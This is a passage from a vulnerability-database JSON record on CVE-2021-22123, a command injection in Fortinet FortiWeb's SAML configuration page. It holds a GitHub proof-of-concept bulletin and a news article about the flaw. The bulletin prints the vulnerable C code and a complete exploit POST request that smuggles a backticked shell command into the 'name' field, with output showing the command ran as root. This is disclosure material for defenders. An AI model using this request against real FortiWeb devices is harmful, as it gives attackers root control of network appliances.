name=\"session-timeout\"\n30\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"sso-bind\"\npost\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"sso-bind_val\"\n1\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"sso-path\"\n/SAML2/POST\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"slo-bind\"\npost\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"slo-bind_val\"\n1\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"slo-path\"\n/SLO/POST\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"flag\"\n0\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"enforce-signing\"\ndisable\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"enforce-signing_val\"\n0\n-----------------------------94351131111899571381631694412\n```\n\n```\nHTTP/1.1 500 Internal Server Error\nDate: Thu, 18 Aug 2021 15:47:45 GMT\nCache-Control: no-cache, no-store, must-revalidate\nPragma: no-cache\nSet-Cookie: redacted\nX-Frame-Options: SAMEORIGIN\nX-XSS-Protection: 1; mode=block\nContent-Security-Policy: frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nContent-Length: 20\nStrict-Transport-Security: max-age=63072000\nConnection: close\nContent-Type: application/json\n\n{\"errcode\": \"-651\"}\n```\nFinally, the results of the 'touch' command can be seen on the local command line of the FortiWeb device\n\n```\n/# ls -l /tmp/CVE-2021-22123\n-rw-r--r-- 1 root 0 0 Aug 10 15:48 /tmp/CVE-2021-22123\n```\n\n<b>References:</b>\n\n* [https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/](https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/)\n* [https://www.ptsecurity.com/ww-en/about/news/positive-technologies-discovers-vulnerability-in-fortinet-firewall/](https://www.ptsecurity.com/ww-en/about/news/positive-technologies-discovers-vulnerability-in-fortinet-firewall/)\n* [https://www.fortiguard.com/psirt/FG-IR-20-120](https://www.fortiguard.com/psirt/FG-IR-20-120)\n", "published": "2021-08-18T10:54:27", "modified": "2021-10-24T06:02:02", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://github.com/murataydemir/CVE-2021-22123", "reporter": "murataydemir", "references": [], "cvelist": ["CVE-2021-22123"], "immutableFields": [], "lastseen": "2021-11-02T13:21:55", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-22123"]}, {"type": "seebug", "idList": ["SSV:99335"]}, {"type": "fortinet", "idList": ["FG-IR-21-116", "FG-IR-20-120"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:9511625276530FB6A6D0D99D27559BAB"]}, {"type": "threatpost", "idList": ["THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9"]}, {"type": "thn", "idList": ["THN:FCBB400B24C7B24CD6B5136FA8BE38D3"]}], "modified": "2021-11-02T13:21:55", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-11-02T13:21:55", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-11-02T13:21:55", "differentElements": ["title"], "edition": 1}, {"bulletin": {"id": "ED9550C1-0AFC-53DF-9BFA-AA6341B6E5AF", "vendorId": "GITHUBEXPL:MURATAYDEMIR-CVE-2021-22123", "hash": "62d868d60e3d7d2145f57872c8c37b27", "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for OS Command Injection in Fortinet Fortiweb", "description": "<b>[CVE-2021-22123] Fortinet FortiWeb Authenticated OS Command Injection</b>\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n\n\n\nThe command injection vulnerability in the FortiWeb management interface may allow an authenticated remote attacker to execute arbitrary commands in the system via the SAML server configuration page. Executing commands with maximum privileges will result in the attacker gaining full control over the server. This is an instance of [CWE-78: Improper Neutralization of Special Elements used in an OS Command](https://cwe.mitre.org/data/definitions/78.html) and has a CVSSv3 base score of 8.7. This vulnerability has `CVE-2021-22123` number, which was addressed in [Fortiguard Lab page (FG-IR-20-120)](https://www.fortiguard.com/psirt/FG-IR-20-120)\n\nBasically, SAML stands for Security Assertion Markup Language and it is an XML-based open-standard for transferring identity data between two parties: an identity provider (IdP) and a service provider (SP). It designed to ensure the operation of a Single Sign-On mechanism, which allows you to access various software products using a single identifier.\n\nFortiWeb `all versions prior to 6.3.7` and below are vulnerable to authenticated OS Command Injection vulnerability. Successfully exploitation of this vulnerability may lead to take complete control of the affected device, with the highest possible privileges. They might install a persistent shell, crypto mining software, or other malicious software. In the unlikely event the management interface is exposed to the internet, they could use the compromised platform to reach into the affected network beyond the DMZ.\n\nAn attacker, who is first authenticated to the management interface of the FortiWeb device, can smuggle commands using backticks in the `name` field of the SAML Server configuration page. These commands are then executed as the root user of the underlying operating system. Vulnerable part of the code is illustrated as below.\n\n```C\nint move_metafile(char * path, char * name) {\n int iVar1;\n char buf[512];\n int nret;\n snprintf(buf, 0x200, \"%s/%s\", \"/data/etc/saml/shibboleth/service_providers\", name);\n iVar1 = access(buf, 0);\n if (iVar1 != 0) {\n snprintf(buf, 0x200, \"mkdir %s/%s\", \"/data/etc/saml/shibboleth/service_providers\", name);\n iVar1 = system(buf);\n if (iVar1 != 0) {\n return iVar1;\n }\n }\n snprintf(buf, 0x200, \"cp %s %s/%s/%s.%s\", path, \"/data/etc/saml/shibboleth/service_providers\", name,\n \"Metadata\", & DAT_00212758);\n iVar1 = system(buf);\n return iVar1;\n}\n```\n\n<b>Proof of Concept (PoC):</b> The following POST request can be used in order to exploit this vulnerability.\n\n```\nPOST /api/v2.0/user/remoteserver.saml HTTP/1.1\nHost: vulnerablehost\nCookie: redacted\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.5; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://vulnerablehost/root/user/remote-user/saml-user/\nX-Csrftoken: 814940160\nContent-Type: multipart/form-data; boundary=---------------------------94351131111899571381631694412\nContent-Length: 3068\nOrigin: https://vulnerablehost\nDnt: 1\nTe: trailers\nConnection: close\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"q_type\"\n1\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"name\"\n`touch /tmp/CVE-2021-22123`\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"entityID\"\ntest\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"service-path\"\n/saml.sso\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"session-lifetime\"\n8\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"session-timeout\"\n30\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"sso-bind\"\npost\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"sso-bind_val\"\n1\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"sso-path\"\n/SAML2/POST\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"slo-bind\"\npost\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"slo-bind_val\"\n1\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"slo-path\"\n/SLO/POST\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"flag\"\n0\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"enforce-signing\"\ndisable\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"enforce-signing_val\"\n0\n-----------------------------94351131111899571381631694412\n```\n\n```\nHTTP/1.1 500 Internal Server Error\nDate: Thu, 18 Aug 2021 15:47:45 GMT\nCache-Control: no-cache, no-store, must-revalidate\nPragma: no-cache\nSet-Cookie: redacted\nX-Frame-Options: SAMEORIGIN\nX-XSS-Protection: 1; mode=block\nContent-Security-Policy: frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nContent-Length: 20\nStrict-Transport-Security: max-age=63072000\nConnection: close\nContent-Type: application/json\n\n{\"errcode\": \"-651\"}\n```\nFinally, the results of the 'touch' command can be seen on the local command line of the FortiWeb device\n\n```\n/# ls -l /tmp/CVE-2021-22123\n-rw-r--r-- 1 root 0 0 Aug 10 15:48 /tmp/CVE-2021-22123\n```\n\n<b>References:</b>\n\n* [https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/](https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/)\n* [https://www.ptsecurity.com/ww-en/about/news/positive-technologies-discovers-vulnerability-in-fortinet-firewall/](https://www.ptsecurity.com/ww-en/about/news/positive-technologies-discovers-vulnerability-in-fortinet-firewall/)\n* [https://www.fortiguard.com/psirt/FG-IR-20-120](https://www.fortiguard.com/psirt/FG-IR-20-120)\n", "published": "2021-08-18T10:54:27", "modified": "2021-10-24T06:02:02", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://github.com/murataydemir/CVE-2021-22123", "reporter": "murataydemir", "references": [], "cvelist": ["CVE-2021-22123"], "immutableFields": [], "lastseen": "2021-11-08T20:13:05", "history": [], "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-22123"]}, {"type": "seebug", "idList": ["SSV:99335"]}, {"type": "fortinet", "idList": ["FG-IR-20-120", "FG-IR-21-116"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:9511625276530FB6A6D0D99D27559BAB"]}, {"type": "threatpost", "idList": ["THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9"]}, {"type": "thn", "idList": ["THN:FCBB400B24C7B24CD6B5136FA8BE38D3"]}], "modified": "2021-11-08T20:13:05", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-11-08T20:13:05", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-11-08T20:13:05", "differentElements": ["title"], "edition": 2}], "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-22123"]}, {"type": "seebug", "idList": ["SSV:99335"]}, {"type": "fortinet", "idList": ["FG-IR-20-120", "FG-IR-21-116"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:9511625276530FB6A6D0D99D27559BAB"]}, {"type": "threatpost", "idList": ["THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9"]}, {"type": "thn", "idList": ["THN:FCBB400B24C7B24CD6B5136FA8BE38D3"]}], "modified": "2021-12-01T17:23:38", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-12-01T17:23:38", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.githubexploit.GithubExploitBulletin", "_object_types": ["robots.models.githubexploit.GithubExploitBulletin", "robots.models.base.Bulletin"], "privateArea": 1}], "thn": [{"id": "THN:FCBB400B24C7B24CD6B5136FA8BE38D3", "hash": "490f6574dd09e4559636f26855c2b661", "type": "thn", "bulletinFamily": "info", "title": "Unpatched Remote Hacking Flaw Disclosed in Fortinet's FortiWeb WAF", "description": "[](<https://thehackernews.com/images/-iRDFz4kb2_c/YRyAnCXcgbI/AAAAAAAADjw/9zUdSCDaZ3wAdT6A32p1ugpUnmn7m6WagCLcBGAsYHQ/s0/Fortinet-zero-day.jpg>)\n\nDetails have emerged about a new unpatched security vulnerability in Fortinet's web application firewall (WAF) appliances that could be abused by a remote, authenticated attacker to execute malicious commands on the system.\n\n\"An OS command injection vulnerability in FortiWeb's management interface (version 6.3.11 and prior) can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page,\" cybersecurity firm Rapid7 [said](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>) in an advisory published Tuesday. \"This vulnerability appears to be related to [CVE-2021-22123](<https://nvd.nist.gov/vuln/detail/CVE-2021-22123>), which was addressed in [FG-IR-20-120](<https://www.fortiguard.com/psirt/FG-IR-20-120>).\"\n\n[](<https://go.thn.li/1-free-300-9> \"Stack Overflow Teams\" )\n\nRapid7 said it discovered and reported the issue in June 2021. Fortinet is expected to release a patch at the end of August with version Fortiweb 6.4.1.\n\nThe command injection flaw is yet to be assigned a CVE identifier, but it has a severity rating of 8.7 on the CVSS scoring system. Successful exploitation of the vulnerability can allow authenticated attackers to execute arbitrary commands as the root user on the underlying system via the SAML server configuration page.\n\n\"An attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges,\" Rapid7's Tod Beardsley said. \"They might install a persistent shell, crypto mining software, or other malicious software. In the unlikely event the management interface is exposed to the internet, they could use the compromised platform to reach into the affected network beyond the DMZ.\"\n\nRapid7 also warns that while authentication is a prerequisite for achieving arbitrary command execution, the exploit could be chained with an authentication bypass flaw, such as [CVE-2020-29015](<https://nvd.nist.gov/vuln/detail/CVE-2020-29015>). In the interim, users are advised to block access to the FortiWeb device's management interface from untrusted networks, including taking steps to prevent direct exposure to the internet.\n\n[](<https://go.thn.li/auth_728> \"Enterprise Password Management\" )\n\nAlthough there is no evidence that the new security issue has been exploited in the wild, it's worth noting that unpatched Fortinet servers have been a lucrative target for financially motivated and state-sponsored threat actors alike.\n\nEarlier this April, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://www.ic3.gov/Media/News/2021/210402.pdf>) of advanced persistent threat groups targeting Fortinet FortiOS servers by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>) to compromise systems belonging to government and commercial entities.\n\nIn the same month, Russian cybersecurity company Kaspersky [revealed](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) that threat actors exploited the CVE-2018-13379 vulnerability in FortiGate VPN servers to gain access to enterprise networks in European countries to deploy the Cring ransomware.\n\n**_Update: _**Fortinet shared the following statement with The Hacker News:\n\n\u201cThe security of our customers is always our first priority. Fortinet recognizes the important role of independent security researchers who work closely with vendors to protect the cybersecurity ecosystem in alignment with their responsible disclosure policies. In addition to directly communicating with researchers, our disclosure policy is clearly outlined on the Fortinet PSIRT Policy page, which includes asking incident submitters to maintain strict confidentiality until complete resolutions are available for customers. As such, we had expected that Rapid7 hold any findings prior to the end of our 90-day Responsible disclosure window. We regret that in this instance, individual research was fully disclosed without adequate notification prior to the 90-day window. We are working to deliver immediate notification of a workaround to customers and a patch released by the end of the week.\u201d\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-08-18T03:41:00", "modified": "2021-08-19T06:50:20", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-29015", "CVE-2021-22123"], "immutableFields": [], "lastseen": "2021-08-19T08:37:47", "history": [{"bulletin": {"id": "THN:FCBB400B24C7B24CD6B5136FA8BE38D3", "hash": "78b285b52fc78fc22e45c323977357ed", "type": "thn", "bulletinFamily": "info", "title": "Unpatched Remote Hacking Flaw Disclosed in Fortinet's FortiWeb WAF", "description": "[](<https://thehackernews.com/images/-iRDFz4kb2_c/YRyAnCXcgbI/AAAAAAAADjw/9zUdSCDaZ3wAdT6A32p1ugpUnmn7m6WagCLcBGAsYHQ/s0/Fortinet-zero-day.jpg>)\n\nDetails have emerged about a new unpatched security vulnerability in Fortinet's web application firewall (WAF) appliances that could be abused by a remote, authenticated attacker to execute malicious commands on the system.\n\n\"An OS command injection vulnerability in FortiWeb's management interface (version 6.3.11 and prior) can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page,\" cybersecurity firm Rapid7 [said](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>) in an advisory published Tuesday. \"This vulnerability appears to be related to [CVE-2021-22123](<https://nvd.nist.gov/vuln/detail/CVE-2021-22123>), which was addressed in [FG-IR-20-120](<https://www.fortiguard.com/psirt/FG-IR-20-120>).\"\n\n[](<https://go.thn.li/1-free-300-8> \"Stack Overflow Teams\" )\n\nRapid7 said it discovered and reported the issue in June 2021. Fortinet is expected to release a patch at the end of August with version Fortiweb 6.4.1.\n\nThe command injection flaw is yet to be assigned a CVE identifier, but it has a severity rating of 8.7 on the CVSS scoring system. Successful exploitation of the vulnerability can allow authenticated attackers to execute arbitrary commands as the root user on the underlying system via the SAML server configuration page.\n\n\"An attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges,\" Rapid7's Tod Beardsley said. \"They might install a persistent shell, crypto mining software, or other malicious software. In the unlikely event the management interface is exposed to the internet, they could use the compromised platform to reach into the affected network beyond the DMZ.\"\n\nRapid7 also warns that while authentication is a prerequisite for achieving arbitrary command execution, the exploit could be chained with an authentication bypass flaw, such as [CVE-2020-29015](<https://nvd.nist.gov/vuln/detail/CVE-2020-29015>). In the interim, users are advised to block access to the FortiWeb device's management interface from untrusted networks, including taking steps to prevent direct exposure to the internet.\n\n[](<https://go.thn.li/ransomware_728> \"Prevent Ransomware Attacks\" )\n\nAlthough there is no evidence that the new security issue has been exploited in the wild, it's worth noting that unpatched Fortinet servers have been a lucrative target for financially motivated and state-sponsored threat actors alike.\n\nEarlier this April, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://www.ic3.gov/Media/News/2021/210402.pdf>) of advanced persistent threat groups targeting Fortinet FortiOS servers by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>) to compromise systems belonging to government and commercial entities.\n\nIn the same month, Russian cybersecurity company Kaspersky [revealed](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) that threat actors exploited the CVE-2018-13379 vulnerability in FortiGate VPN servers to gain access to enterprise networks in European countries to deploy the Cring ransomware.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-08-18T03:41:00", "modified": "2021-08-18T03:41:47", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-29015", "CVE-2021-22123"], "immutableFields": [], "lastseen": "2021-08-18T06:37:52", "history": [], "viewCount": 75, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B54A15A1-8D06-4902-83F9-DC10E40FA81A", "AKB:91756851-9B25-4801-B911-E3226A0656B5", "AKB:35B88369-C440-49C0-98FF-C50E258FB32C"]}, {"type": "cve", "idList": ["CVE-2018-13379", "CVE-2021-22123", "CVE-2020-29015", "CVE-2020-12812", "CVE-2019-5591"]}, {"type": "cisa", "idList": ["CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C", "CISA:24BBE0D109CEB29CF9FC28CEA2AD0CFF"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:9511625276530FB6A6D0D99D27559BAB", "RAPID7BLOG:5109AC30126DB59333F13ED32F7F4713", "RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "threatpost", "idList": ["THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:35A43D6CB9FAF8966F5C0D20045D1166", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:3CC83DBBAFE2642F4E6D533DDC400BF6", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A"]}, {"type": "nessus", "idList": ["FORTIOS_FG-IR-19-283.NASL", "FORTIOS_FG-IR-19-037.NASL", "FORTIOS_FG-IR-18-384_DIRECT.NASL", "MACOSX_FORTIOS_FG-IR-18-384.NASL", "FORTIOS_FG-IR-18-384.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33133", "1337DAY-ID-33134"]}, {"type": "kitploit", "idList": ["KITPLOIT:763105754466120590", "KITPLOIT:5563730483162396602", "KITPLOIT:7070039119688478663", "KITPLOIT:2722328714476257207", "KITPLOIT:3532211766929466258", "KITPLOIT:5397133847150975825", "KITPLOIT:4425790137948714912", "KITPLOIT:2686676167278919598", "KITPLOIT:816704453339226193", "KITPLOIT:119877528847056004"]}, {"type": "exploitdb", "idList": ["EDB-ID:47288", "EDB-ID:47287"]}, {"type": "dsquare", "idList": ["E-691"]}, {"type": "thn", "idList": ["THN:FBDAEC0555EDC3089DC0966D121E0BCE", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:EAEDDF531EB90375B350E1580DE3DD02", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E222442D181419B052AACE6DA4BC8485", "EXPLOITPACK:6EF33E509C6C5002F8E81022F84C01B5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154147", "PACKETSTORM:154146"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0"]}], "modified": "2021-08-18T06:37:52", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-08-18T06:37:52", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-08-18T06:37:52", "differentElements": ["description", "modified"], "edition": 1}], "viewCount": 292, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:35B88369-C440-49C0-98FF-C50E258FB32C", "AKB:91756851-9B25-4801-B911-E3226A0656B5", "AKB:B54A15A1-8D06-4902-83F9-DC10E40FA81A"]}, {"type": "threatpost", "idList": ["THREATPOST:8A56F3FFA956FB0BB2BB4CE451C3532C", "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9", "THREATPOST:35A43D6CB9FAF8966F5C0D20045D1166", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A", "THREATPOST:3CC83DBBAFE2642F4E6D533DDC400BF6", "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D"]}, {"type": "seebug", "idList": ["SSV:99335"]}, {"type": "cve", "idList": ["CVE-2020-12812", "CVE-2021-22123", "CVE-2020-29015", "CVE-2018-13379", "CVE-2019-5591"]}, {"type": "cisa", "idList": ["CISA:24BBE0D109CEB29CF9FC28CEA2AD0CFF", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5109AC30126DB59333F13ED32F7F4713", "RAPID7BLOG:9511625276530FB6A6D0D99D27559BAB", "RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "thn", "idList": ["THN:EAEDDF531EB90375B350E1580DE3DD02", "THN:8483C1B45A5D7BF5D501DE72F5898935", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:FBDAEC0555EDC3089DC0966D121E0BCE", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:C3B82BB0558CF33CFDC326E596AF69C4"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-1187"]}, {"type": "fortinet", "idList": ["FG-IR-18-384", "FG-IR-21-116", "FG-IR-20-124", "FG-IR-20-120", "FG-IR-20-233", "FG-IR-19-037", "FG-IR-19-283"]}, {"type": "githubexploit", "idList": ["ED9550C1-0AFC-53DF-9BFA-AA6341B6E5AF"]}, {"type": "nessus", "idList": ["FORTIOS_FG-IR-19-037.NASL", "MACOSX_FORTIOS_FG-IR-18-384.NASL", "FORTIOS_FG-IR-18-384_DIRECT.NASL", "FORTIOS_FG-IR-18-384.NASL", "FORTIOS_FG-IR-19-283.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:47288", "EDB-ID:47287"]}, {"type": "exploitpack", "idList": 